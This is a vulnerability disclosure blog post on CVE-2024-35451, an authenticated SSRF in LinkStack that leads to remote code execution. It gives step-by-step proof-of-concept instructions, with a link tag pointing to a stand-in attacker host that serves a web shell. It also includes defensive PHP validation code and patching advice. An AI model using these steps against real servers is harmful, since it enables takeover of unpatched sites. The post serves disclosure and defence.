CVE-2024-35451: From (Authenticated) SSRF to Remote Code Execution

Datafarm
Nov 28, 2024

Overview

Earlier this year, I discovered a critical vulnerability, now identified as CVE-2024-35451, in LinkStack 2.7.9–4.7.7. This vulnerability allows an authenticated attacker to achieve remote code execution (RCE), potentially taking full control of vulnerable systems.

What is SSRF

Server-Side Request Forgery (SSRF) is a web security vulnerability that allows an attacker to trick a server into making unintended requests to internal or external resources. By manipulating user input, attackers can force the server to send requests to vulnerable endpoints, potentially exposing sensitive information, compromising internal systems, or even executing malicious code.

CVE-2024-35451 Technical Details

The vulnerability lies in the “resources\views\components\favicon.blade.php” file, where an authenticated attacker can manipulate the “link” parameter to trick the server into making requests to the attacker's own server. This allows the attacker to download malicious files, such as web shells, onto the compromised server. Once installed, a web shell lets the attacker execute arbitrary commands, potentially seizing full control of the system.

Proof-of-Concept

1. Create a file (it does not have to be an HTML file) containing a link to the web shell URL:

<link rel="shortcut icon" href="http://attacker.local/exploit.php">

2. Set up an HTTP server to serve both the HTML file and the web shell.

3. Log in to the LinkStack site and go to “Home > Add Link” and select “Custom Link”.

4. Enter the URL of the Python server in the “URL” field. Check the “Show website icon on button” box and save the data.

5. We can see requests coming in from LinkStack, first for the HTML file, then for the web shell.

6. After that, LinkStack will redirect to the “/studio/links” page. The custom link should now be created.

7. Use Burp Suite to intercept requests and observe LinkStack attempting to fetch a PHP file from itself. That’s the web shell!

8. Once the web shell is installed, we’ve got RCE on the system.
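One way to close the fetch-and-store path that the steps above rely on, as an added example that is not LinkStack's code or its 4.8.0 patch. It assumes the fetcher saved the icon under the web root with the extension taken from the remote URL; `ICON_TYPES`, `iconUrlIsAllowed` and `storedIconName` are hypothetical names.

```php
<?php
// Added example, not LinkStack code. Assumption: the vulnerable fetcher saved
// the icon under the web root with the extension taken from the remote URL.
const ICON_TYPES = [ // MIME type sniffed from the bytes => extension we store
    'image/png' => 'png', 'image/jpeg' => 'jpg', 'image/gif' => 'gif',
    'image/webp' => 'webp', 'image/x-icon' => 'ico',
    'image/vnd.microsoft.icon' => 'ico',
];

/** Allow only http(s) URLs whose host resolves to public addresses. */
function iconUrlIsAllowed(string $url): bool
{
    $p = parse_url($url);
    if (!is_array($p) || !isset($p['scheme'], $p['host'])) return false;
    if (!in_array(strtolower($p['scheme']), ['http', 'https'], true)) return false;
    $host = trim($p['host'], '[]');
    // gethostbynamel() is IPv4-only; a literal IP is checked directly.
    $ips = filter_var($host, FILTER_VALIDATE_IP) ? [$host] : (gethostbynamel($host) ?: []);
    foreach ($ips as $ip) {
        $public = filter_var($ip, FILTER_VALIDATE_IP,
            FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE);
        if ($public === false) return false;
    }
    return $ips !== [];
}

/** Derive the stored name from the content, never from the remote URL. */
function storedIconName(int $linkId, string $bytes): ?string
{
    if ($bytes === '' || strlen($bytes) > 512 * 1024) return null; // size cap
    $mime = (string) (new finfo(FILEINFO_MIME_TYPE))->buffer($bytes);
    $ext = ICON_TYPES[$mime] ?? null;          // null: content is not an image
    if ($ext === null || stripos($bytes, '<?php') !== false) return null;
    return $linkId . '.' . $ext;               // server-chosen name and extension
}

// Constructed samples: a PHP body like the one the PoC host serves, and a
// header-only PNG (signature plus IHDR chunk header).
$php = "<?php /* placeholder */ ?>";
$png = "\x89PNG\r\n\x1a\n\x00\x00\x00\x0dIHDR" . pack('NN', 16, 16) . "\x08\x06\x00\x00\x00";

var_dump(iconUrlIsAllowed('file:///etc/passwd'));
var_dump(iconUrlIsAllowed('http://127.0.0.1/exploit.php'));
var_dump(storedIconName(7, $php));
var_dump(storedIconName(7, $png));
```

Validating the hostname and then fetching by name leaves a DNS rebinding window, so the request should connect to the address that was checked. The directory that holds stored icons should also be configured so the web server never executes PHP from it.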

Conclusion

CVE-2024-35451 highlights the importance of timely security patches. This vulnerability was addressed in version 4.8.0, released in May. It’s crucial to keep your software up to date and implement robust security practices to protect against similar attacks. By staying informed about vulnerabilities and applying patches promptly, we can significantly reduce the risk of exploitation.
